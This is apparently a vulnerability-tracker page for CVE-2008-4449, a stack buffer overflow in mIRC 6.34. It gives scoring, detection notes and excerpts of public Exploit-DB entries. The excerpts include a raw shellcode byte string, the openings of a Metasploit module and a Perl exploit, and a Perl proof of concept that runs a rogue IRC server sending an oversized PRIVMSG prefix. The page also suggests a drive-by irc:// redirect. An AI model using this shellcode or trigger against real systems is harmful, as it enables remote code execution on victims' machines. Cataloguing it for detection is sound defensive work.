CVE-2008-4449
published 2008-10-06CVE-2008-4449: Stack-based buffer overflow in mIRC 6.34 allows remote attackers to execute arbitrary code via a long hostname in a PRIVMSG message.
PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
38.74%
98.4th percentile
Stack-based buffer overflow in mIRC 6.34 allows remote attackers to execute arbitrary code via a long hostname in a PRIVMSG message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mirc | mirc | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1
- →Detect oversized IRC PRIVMSG hostname: a PRIVMSG message with a hostname/prefix field of 307+ 'A' characters (or random alphanumeric) followed by binary data is the exploit trigger pattern. ↗
- →Detect exploit PoC pattern: IRC PRIVMSG with a prefix of 313 'A' characters followed by two bytes \x43\x43 is the PoC trigger. ↗
- →Payload bad characters for this exploit include null bytes, IRC control characters, and common special characters; network signatures should flag IRC PRIVMSG messages containing binary data in the source prefix field. ↗
- →The exploit can be triggered via a browser by redirecting a victim to an irc:// URI pointing to the attacker's server, enabling drive-by exploitation. ↗
- →Metasploit module listens on TCP port 6667 acting as a rogue IRC server; monitor for outbound mIRC connections to untrusted IRC servers on port 6667 followed by receipt of a PRIVMSG with a binary-laden prefix. ↗
- ·Due to payload space constraints (160 bytes), ordinal payloads may be required instead of full shellcode when using the Metasploit module. ↗
- ·The Metasploit module uses a StackAdjustment of -3500, which is an unusual value that may affect payload reliability on non-targeted configurations. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)
exploitdb·2010-06-22
CVE-2008-4449 mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)
mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)
---
##
# $Id: mirc_privmsg_server.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'mIRC %q{
This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.
By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG
command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads
may be necessary. This module is based on the code by SkD.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Versi
Exploit-DB
mIRC 6.34 - Remote Buffer Overflow
exploitdb·2008-10-04
CVE-2008-4449 mIRC 6.34 - Remote Buffer Overflow
mIRC 6.34 - Remote Buffer Overflow
---
#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat hotmail com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------
use IO::Socket;
if(!($ARGV[1]))
{
print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Use: mirc_exp.pl \n[x] Example: mirc_exp.pl 6667 0\n\n";
exit;
}
while(1)
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalA
Exploit-DB
mIRC 6.34 - Remote Buffer Overflow (PoC)
exploitdb·2008-10-02
CVE-2008-4449 mIRC 6.34 - Remote Buffer Overflow (PoC)
mIRC 6.34 - Remote Buffer Overflow (PoC)
---
##################################################################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/... in some html page
#
use IO::Socket;
sub sock()
{
my $sock=new IO::Socket::INET (
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 6667,
Proto => 'tcp'); die unless $sock;
print " [+]IRC Server started on port 6667 \r\n";
$s=$sock->accept();
$a = "A" x 313;
$twobytes = "\x43\x43";
print " [+]Sending pickles\r\n";
print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n";
sleep(1);
print $s ":".$a.$twobytes." PRIVMSG yow : /FINGER yow.\r\n";
Metasploit
mIRC PRIVMSG Handling Stack Buffer Overflow
metasploit
mIRC PRIVMSG Handling Stack Buffer Overflow
mIRC PRIVMSG Handling Stack Buffer Overflow
This module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier. By enticing a mIRC user to connect to this server module, an excessively long PRIVMSG command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD.
No writeups or analysis indexed.
http://secunia.com/advisories/32102http://securityreason.com/securityalert/4352http://www.securityfocus.com/bid/31552http://www.vupen.com/english/advisories/2008/2736https://exchange.xforce.ibmcloud.com/vulnerabilities/45624https://www.exploit-db.com/exploits/6654https://www.exploit-db.com/exploits/6666http://secunia.com/advisories/32102http://securityreason.com/securityalert/4352http://www.securityfocus.com/bid/31552http://www.vupen.com/english/advisories/2008/2736https://exchange.xforce.ibmcloud.com/vulnerabilities/45624https://www.exploit-db.com/exploits/6654https://www.exploit-db.com/exploits/6666
2008-10-06
Published